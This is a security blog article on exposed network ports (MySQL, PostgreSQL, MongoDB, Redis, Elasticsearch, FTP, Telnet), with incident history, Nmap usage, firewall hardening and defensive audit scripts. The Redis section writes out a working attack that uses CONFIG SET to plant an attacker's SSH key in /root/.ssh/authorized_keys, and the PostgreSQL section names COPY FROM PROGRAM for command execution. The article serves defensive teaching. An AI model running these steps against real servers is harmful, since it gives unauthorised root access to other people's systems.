Open Ports — Risks and Protection
Published: April 8, 2026 · Reading time: 14 min
1. What are ports and how they work
Network ports are virtual communication endpoints on a host, identified by a number carried in the transport-layer header. When your application listens on a specific port, it receives data from clients connecting to that port. Both TCP and UDP use a 16-bit port field, giving a range from 0 to 65,535 (65,536 ports per transport protocol, per IP address).
Port categories
| Range | Name | Description |
|---|---|---|
| 0-1023 | Well-known ports | Assigned by IANA to standard services (HTTP 80, HTTPS 443, SSH 22); on Unix-like systems a process needs root or CAP_NET_BIND_SERVICE to bind them |
| 1024-49151 | Registered ports | Registered with IANA for specific applications (MySQL 3306, PostgreSQL 5432) |
| 49152-65535 | Dynamic/Private (ephemeral) | Chosen automatically as the source port of outgoing client connections |
TCP vs UDP
TCP (Transmission Control Protocol) establishes a reliable, ordered connection via a "three-way handshake" (SYN, SYN-ACK, ACK); that handshake is also what a port scanner relies on to decide whether a TCP port is open. Used for HTTP, SSH, databases. UDP (User Datagram Protocol) is connectionless: no handshake, no acknowledgements, lower latency but no delivery guarantee. Because a UDP service that stays silent and a firewall that drops the probe look identical to a scanner, UDP scans are slower and less certain than TCP scans. Used for DNS (port 53), NTP (port 123), streaming, gaming.
2. Most dangerous open ports
Port 3306 — MySQL
MySQL listens on port 3306 by default. If it is reachable from the internet, attackers can brute-force credentials (the root account is the obvious target) or exploit known vulnerabilities in unpatched versions. Many installations still have a weak or empty root password, and while the Debian/Ubuntu packages bind MySQL to 127.0.0.1, manual installs and container images commonly listen on 0.0.0.0.
Port 5432 — PostgreSQL
PostgreSQL uses port 5432. Its defaults are somewhat better than MySQL's (pg_hba.conf requires authentication for every connection), but exposing it to the public internet is still a risk. Once authenticated as a superuser (or as a member of pg_read_server_files / pg_execute_server_program), an attacker can read files with pg_read_file() and run OS commands with COPY ... FROM PROGRAM, so a guessable postgres password on a public port amounts to remote code execution on the host.
Port 27017 — MongoDB
MongoDB was notoriously insecure in older versions: it required no authentication by default and listened on all interfaces. That combination led to the mass ransomware attacks of 2017. Since 3.6 the server binds to localhost by default, but access control stays off until you create users and enable security.authorization, so a MongoDB deliberately exposed with bindIp: 0.0.0.0 and no users is exactly as open as the 2017 victims were.
Port 6379 — Redis
Redis originally shipped with no password and listened on all interfaces. Since Redis 3.2, "protected mode" refuses connections from non-loopback addresses when no bind address and no password are configured, and the shipped redis.conf binds to loopback. The attack below still works wherever protected mode has been switched off (common in container images started with --protected-mode no) or bind 0.0.0.0 was set without requirepass. An attacker who can reach such an instance can use CONFIG SET to make Redis write its dump file wherever the Redis process has write access, including an SSH authorized_keys file when Redis runs as root:
# Attacker can execute the following if Redis is reachable and unauthenticated
# (assumes Redis runs as root, so /root/.ssh is writable by it):
redis-cli -h victim.com                 # opens an interactive session; the lines below are typed into it
CONFIG SET dir /root/.ssh/              # where the next SAVE will write
CONFIG SET dbfilename "authorized_keys" # what the dump file will be called
SET payload "\n\nssh-rsa AAAA... attacker@evil\n\n"   # newlines keep the key on a line of its own
SAVE                                    # writes the RDB dump to /root/.ssh/authorized_keys
# sshd ignores the binary RDB bytes around the key line, so the attacker now has root SSH access
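The attack above needs three things to line up: Redis reachable on a non-loopback address, no password (and protected mode off), and the CONFIG command still available. The following added example, written for this article rather than taken from the Redis project, audits a redis.conf for exactly those preconditions. It parses the real directive names (bind, protected-mode, requirepass, rename-command, user); the two configuration files it checks are constructed samples, one in the exposed shape and one hardened.

```python
import shlex

# Constructed sample redis.conf files (not from any real deployment).
WEAK_CONF = """\
port 6379
bind 0.0.0.0
protected-mode no
# requirepass foobared
dir /var/lib/redis
"""

HARDENED_CONF = """\
port 6379
bind 127.0.0.1 -::1
protected-mode yes
requirepass "a-long-random-secret"
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""

# Loopback spellings accepted by redis.conf; a leading '-' means "optional if unavailable".
LOOPBACK = {"127.0.0.1", "::1", "-::1", "-127.0.0.1", "localhost"}


def parse_conf(text):
    """Parse redis.conf into {directive: [args, args, ...]}.

    A directive may appear more than once (rename-command), so each one maps to
    a list of argument lists in file order. Comments and blank lines are skipped.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" in rename-command CONFIG ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(text):
    """Return the findings that together make the CONFIG SET dir attack possible."""
    conf = parse_conf(text)
    findings = []

    # No bind line means every interface; anything beyond loopback is exposure.
    binds = conf.get("bind", [[]])[-1]
    if not binds or any(b not in LOOPBACK for b in binds):
        findings.append("bind: listens on a non-loopback address (no bind line = all interfaces)")

    # Protected mode (default yes since 3.2) refuses non-loopback clients when
    # no bind and no password are set; turning it off removes that safety net.
    if conf.get("protected-mode", [["yes"]])[-1] == ["no"]:
        findings.append("protected-mode no: remote clients accepted without any authentication")

    # requirepass (or ACL users) is what stands between a network client and
    # CONFIG SET; a commented-out or empty requirepass counts as absent.
    password = conf.get("requirepass", [[]])[-1]
    if not (password and password[0]) and "user" not in conf:
        findings.append("no requirepass and no ACL users: every client is an administrator")

    # Renaming CONFIG to "" removes the file-write primitive even for
    # authenticated clients; Redis 6+ ACLs (-@dangerous) achieve the same.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command still available: 'CONFIG SET dir' file write is possible")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit(text) or ['no findings']}")
```

Run it against the config file of any Redis you operate; the weak sample produces four findings and the hardened one none. The check does not see what user the daemon runs as, so pair it with ps or systemctl: a Redis running as root turns a file write into a root shell, as the attack above shows.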
Port 9200 — Elasticsearch
Elasticsearch ran with no authentication at all before version 8.0: the security features were a paid extra until 6.8/7.1 and, although free after that, stayed disabled by default through the 7.x line. 8.0 enables authentication and TLS on first start, but 7.x clusters and 8.x clusters with xpack.security.enabled: false remain common. A publicly exposed instance typically holds sensitive data (logs, user records, financial records) and lets anyone query or delete it over the REST API. Shodan regularly lists thousands of unprotected instances.
Port 21 — FTP
FTP (File Transfer Protocol) sends the username, password and file contents in plain text. Anyone on the network path (a shared Wi-Fi segment, a compromised router, an upstream provider) can read the credentials. Use SFTP (over SSH) or FTPS instead.
Port 23 — Telnet
Telnet is a completely unencrypted remote-access protocol that predates SSH. There is no justification for exposing it today, yet it still ships enabled on many IoT devices and older network gear, which keeps it a favourite brute-force target for botnets.
3. Real-world security incidents
MongoDB Ransomware (January 2017)
In January 2017, multiple attacker groups systematically scanned the internet for MongoDB instances without authentication. They found tens of thousands. Attackers deleted databases and left ransom notes (typically 0.2 BTC).
According to Shodan, over 28,000 MongoDB servers were compromised in the first few weeks. One attacker going by "Harak1r1" alone compromised over 2,000 databases.
Source: Bleeping Computer, "MongoDB Apocalypse", January 2017
Redis unauthorized access
In 2015, researchers demonstrated how an attacker could abuse a publicly accessible Redis instance to write an SSH key to the server and gain full root access — without knowing any password. The technique uses the CONFIG SET command to change the data save directory.
Shodan searches still surface large numbers of Redis instances listening on public IP addresses, many of them without any authentication.
Source: Antirez blog, "A few things about Redis security", 2015
Elasticsearch data breaches
In late 2019, researchers Bob Diachenko and Vinny Troia found an unprotected Elasticsearch cluster exposing 1.2 billion records of personal data (names, email addresses, phone numbers, social-media profile links including LinkedIn). The data had been aggregated from several data-enrichment services, and the server answered queries from anyone without authentication.
Source: DataViper/Vinny Troia, "1.2 Billion Records Found Exposed Online", 2019
4. Nmap — port scanning
Nmap (Network Mapper) is the most popular open-source tool for network scanning and port discovery. It is used by both security professionals and system administrators.
Basic Nmap commands
# Scan the most common 1000 TCP ports (a SYN scan when run as root, a full connect scan otherwise)
nmap your-server.com
# Scan ALL TCP ports: -p- covers 1-65535; port 0 is skipped unless you write -p0-
nmap -p- your-server.com
# Scan with service and version detection (banner grabbing)
nmap -sV your-server.com
# Scan only the ports discussed in this article
nmap -p 22,80,443,3306,5432,6379,27017,9200 your-server.com
# Aggressive scan (OS detection, default scripts, version detection, traceroute); OS detection needs root
sudo nmap -A your-server.com
# UDP scan (needs root; slow because unanswered probes have to time out)
sudo nmap -sU -p 53,123,161 your-server.com
# Run the NSE vulnerability scripts; -sV gives the scripts the version data most of them need
nmap -sV --script vuln your-server.com
# Only scan hosts you own or are authorised to test: scans are logged and routinely trigger alerts.
Reading results
PORT      STATE     SERVICE   VERSION
22/tcp    open      ssh       OpenSSH 8.9
80/tcp    open      http      nginx 1.18
443/tcp   open      ssl/http  nginx 1.18
3306/tcp  filtered  mysql                  <-- firewall dropping packets, good
6379/tcp  open      redis     Redis 7.0.5  <-- DANGEROUS: check authentication now
9200/tcp  closed    wap-wsp                <-- nothing listening, OK
The SERVICE column is looked up from the port number (which is why 9200 shows nmap's table name "wap-wsp"); only -sV actually identifies the software.
| State | Meaning | Action |
|---|---|---|
| open | A service completed the handshake and is listening | Decide whether it must be public; if not, firewall it or bind it to an internal address |
| closed | The host answered with a TCP RST: reachable, but nothing listening | Generally OK; it does tell a scanner the host is up and that this port is not firewalled |
| filtered | No reply (firewall DROP or no route), so the scanner cannot tell | Expected for internal services; a REJECT rule that sends a TCP reset shows up as closed instead |
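The three states come straight from how a TCP connect behaves, which the section on TCP above describes: the handshake completes (open), the host answers with RST (closed), or nothing comes back before the timeout (filtered). The added example below, written for this article and not an nmap component, classifies ports the way nmap's connect scan (-sT) does and then applies the article's list of risky ports to the result. It runs offline: a local listener stands in for an exposed service, and the port numbers of the demo are whatever the OS hands out, so the triage call passes its own risky-port map for that run.

```python
import errno
import socket

# Ports this article flags as dangerous when reachable from the internet.
RISKY_PORTS = {
    21: "ftp", 23: "telnet", 3306: "mysql", 5432: "postgresql",
    6379: "redis", 9200: "elasticsearch", 27017: "mongodb",
}


def probe(host, port, timeout=1.0):
    """Classify one TCP port the way nmap's connect scan (-sT) does.

    open     -> the three-way handshake completed, something is listening
    closed   -> the host answered with RST: reachable, nothing listening
    filtered -> no answer before the timeout (or no route): a firewall DROP
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError as e:
        # ENETUNREACH/EHOSTUNREACH: no RST ever came back, same as a silent firewall.
        if e.errno in (errno.ENETUNREACH, errno.EHOSTUNREACH):
            return "filtered"
        raise
    finally:
        s.close()


def scan(host, ports, timeout=1.0):
    """Return {port: state} for every port in `ports`."""
    return {p: probe(host, p, timeout) for p in ports}


def triage(results, risky=None):
    """Return, sorted, the open ports that should not be public."""
    risky = RISKY_PORTS if risky is None else risky
    return sorted(p for p, state in results.items() if state == "open" and p in risky)


# Helpers for the offline demo: a local listener plays the exposed service.
def start_listener(host="127.0.0.1", port=0):
    """Bind and listen on `port` (0 = any free port); returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def free_port(host="127.0.0.1"):
    """Return a port number with nothing listening on it (bind, read, release)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    # Constructed demo: the listener stands in for a Redis that was left exposed.
    srv, redis_port = start_listener()
    closed = free_port()
    results = scan("127.0.0.1", [redis_port, closed])
    for port, state in results.items():
        print(f"{port}/tcp {state}")
    # Treat the listener's port as if it were 6379 for triage purposes.
    print("risky open ports:", triage(results, risky={redis_port: "redis"}))
    srv.close()
```

Against a real host, call scan("your-server.com", RISKY_PORTS) from a machine outside your network and feed the result to triage(); a port that comes back "filtered" from outside but "open" from inside is the firewall doing its job.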
5. Protection methods
5.1 Firewall rules (iptables / ufw)
# UFW (Ubuntu Uncomplicated Firewall), the simplest option for a single host
sudo ufw default deny incoming      # everything not listed below is dropped
sudo ufw default allow outgoing
sudo ufw allow 22/tcp               # SSH: add this BEFORE enabling or you lock yourself out
sudo ufw allow 80/tcp               # HTTP
sudo ufw allow 443/tcp              # HTTPS
sudo ufw enable
sudo ufw status numbered            # verify what is actually allowed
# Allow MySQL only from one application server
sudo ufw allow from 10.0.1.5 to any port 3306 proto tcp
# iptables: the same idea for Redis. Order matters: the ACCEPT must precede the DROP
iptables -A INPUT -p tcp --dport 6379 -s 10.0.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 6379 -j DROP
# iptables rules are not persistent across reboots; save them (iptables-save, netfilter-persistent) or use nftables
5.2 Bind to localhost
Configure services to listen only on 127.0.0.1 (or on the address of a private interface when other hosts need them) instead of 0.0.0.0. This removes the exposure even if a firewall rule is later opened by mistake. After restarting each service, confirm with ss -tlnp that it now shows 127.0.0.1:<port> rather than 0.0.0.0:<port> or *:<port>:
# MySQL (my.cnf)
[mysqld]
bind-address = 127.0.0.1
# Redis (redis.conf); keep protected-mode at its default of yes as well
bind 127.0.0.1 -::1
# MongoDB (mongod.conf); YAML, so the indentation is required
net:
  bindIp: 127.0.0.1
# Elasticsearch (elasticsearch.yml); a single node only needs loopback
network.host: 127.0.0.1
5.3 SSH tunneling
To reach an internal service from a remote location, use an SSH tunnel instead of exposing the port. The service keeps listening on 127.0.0.1 only, and the traffic rides inside the SSH session:
# Forward local port 3306 to MySQL on the server; -N opens the tunnel without a shell
ssh -N -L 3306:localhost:3306 user@server.com
# In another terminal, connect through the tunnel. Use 127.0.0.1 rather than localhost,
# so the mysql client opens a TCP connection instead of looking for a local Unix socket
mysql -h 127.0.0.1 -P 3306 -u user -p
5.4 VPN for internal services
Use WireGuard or OpenVPN for access to internal services. Database servers and admin panels should be reachable only from the VPN address range, and that restriction belongs in the firewall (allow from the VPN subnet, deny everything else) as well as in the service's own bind address and authentication.
6. Cloud security groups
AWS Security Groups
# AWS CLI: create a security group with minimal access.
# Security groups are stateful and deny all inbound traffic until a rule allows it,
# so the rules below are the complete inbound allow list.
# In a non-default VPC add --vpc-id vpc-... here and use the returned GroupId
# (--group-id sg-...) in the authorize calls instead of --group-name.
aws ec2 create-security-group \
  --group-name web-server-sg \
  --description "Web server security group"
# Allow only HTTP and HTTPS from anywhere (add ::/0 with --ip-permissions if the instance has IPv6)
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 80 --cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 443 --cidr 0.0.0.0/0
# SSH only from your own address (a /32), never from 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
  --group-name web-server-sg \
  --protocol tcp --port 22 --cidr 203.0.113.50/32
Google Cloud Firewall
# GCP: allow only web traffic, and only to instances tagged web-server
gcloud compute firewall-rules create allow-web \
  --allow tcp:80,tcp:443 \
  --source-ranges 0.0.0.0/0 \
  --target-tags web-server
# Explicitly deny database ports from everywhere. A lower number is a higher priority,
# so this rule (100) beats the default-allow-* rules of the default network (65534).
# 0.0.0.0/0 also covers your own VPC subnets: add an allow rule with a priority below
# 100 for the internal range, or the application tier loses its databases too.
gcloud compute firewall-rules create deny-db \
  --action deny \
  --rules tcp:3306,tcp:5432,tcp:27017,tcp:6379,tcp:9200 \
  --source-ranges 0.0.0.0/0 \
  --priority 100
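Rules like the ones above drift: someone opens 3306 to 0.0.0.0/0 "temporarily" and it stays. The added example below, written for this article rather than taken from any AWS tool, audits the output of aws ec2 describe-security-groups for risky TCP ports exposed to 0.0.0.0/0 or ::/0. The JSON shape (SecurityGroups, IpPermissions, IpProtocol, FromPort/ToPort, IpRanges/Ipv6Ranges) is the one the CLI returns; the group IDs and rules in the sample are constructed, and the IpProtocol "-1" entry shows the all-traffic case, where AWS omits the port fields.

```python
import ipaddress
import json

# TCP ports the article says must never be open to the world.
RISKY_TCP_PORTS = {
    22: "ssh", 3306: "mysql", 5432: "postgresql", 6379: "redis",
    9200: "elasticsearch", 27017: "mongodb",
}

# Constructed sample in the shape `aws ec2 describe-security-groups` returns
# (fake group IDs; values chosen to exercise each code path).
SAMPLE = json.loads("""
{"SecurityGroups": [
  {"GroupId": "sg-0123456789abcdef0", "GroupName": "web-server-sg",
   "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
     {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
      "IpRanges": [{"CidrIp": "203.0.113.50/32"}], "Ipv6Ranges": []}
   ]},
  {"GroupId": "sg-0fedcba9876543210", "GroupName": "db-sg",
   "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 3306, "ToPort": 3306,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
     {"IpProtocol": "-1",
      "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
     {"IpProtocol": "tcp", "FromPort": 6000, "ToPort": 7000,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}
   ]}
]}
""")


def is_world_open(cidr):
    """True for 0.0.0.0/0 or ::/0: a /0 prefix means 'everyone'."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def rule_sources(perm):
    """All CIDR sources of one IpPermissions entry (IPv4 and IPv6)."""
    return ([r["CidrIp"] for r in perm.get("IpRanges", [])]
            + [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])])


def rule_covers_tcp(perm, port):
    """Does this entry allow TCP `port`? Protocol -1 means every port of every
    protocol, and AWS omits FromPort/ToPort in that case."""
    proto = perm["IpProtocol"]
    if proto == "-1":
        return True
    if proto != "tcp":
        return False
    return perm.get("FromPort", 0) <= port <= perm.get("ToPort", 65535)


def audit_security_groups(doc, risky=None):
    """Return [(group_id, group_name, [ports], [world cidrs])] for every rule that
    exposes a risky TCP port to 0.0.0.0/0 or ::/0. Ranges (6000-7000) are checked
    port by port, so a wide range that happens to include 6379 is caught too."""
    risky = RISKY_TCP_PORTS if risky is None else risky
    findings = []
    for sg in doc["SecurityGroups"]:
        for perm in sg.get("IpPermissions", []):
            world = [c for c in rule_sources(perm) if is_world_open(c)]
            if not world:
                continue
            hits = sorted(p for p in risky if rule_covers_tcp(perm, p))
            if hits:
                findings.append((sg["GroupId"], sg["GroupName"], hits, world))
    return findings


if __name__ == "__main__":
    for gid, name, ports, sources in audit_security_groups(SAMPLE):
        print(f"{gid} ({name}): ports {ports} open to {sources}")
```

Feed it the real output (aws ec2 describe-security-groups --output json) in a scheduled job and alert on any finding; the web group passes, the database group is flagged twice, once for 3306 and once because the 6000-7000 range silently includes Redis. The same logic applies to gcloud compute firewall-rules list --format=json, only the field names differ.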
7. Frequently asked questions
Q: Is moving a service to a non-standard port enough to protect it?
A: No. "Security through obscurity" is not real protection. Nmap scans all 65,535 ports with -p-, and Shodan fingerprints services by their banner regardless of the port number. Use a firewall and authentication; a changed port at most reduces the log noise from automated scanners.
Q: How do I check which of my ports are reachable from the internet?
A: Use Shodan.io to see your host from the internet's perspective, or run nmap -sV -p- your-server.com from a machine outside your network (a scan from inside the same network passes firewall rules that external traffic would not). Our Web Security Scanner also checks the most common risky ports.
Q: Is it safe to leave SSH publicly reachable?
A: SSH is designed to be exposed, but take precautions: use keys instead of passwords (PasswordAuthentication no), disable root login (PermitRootLogin no), use fail2ban against brute force, and restrict the source addresses in the firewall wherever you can. Port knocking adds a little obscurity on top; it does not replace the measures above.
8. References
- SANS Top 25 Most Dangerous Software Errors
- Shodan — Search Engine for Internet-Connected Devices
- Nmap Reference Guide (nmap.org)
- Bleeping Computer: MongoDB Apocalypse (2017)
- Antirez: A few things about Redis security
- DataViper: 1.2 Billion Records Found Exposed Online (2019)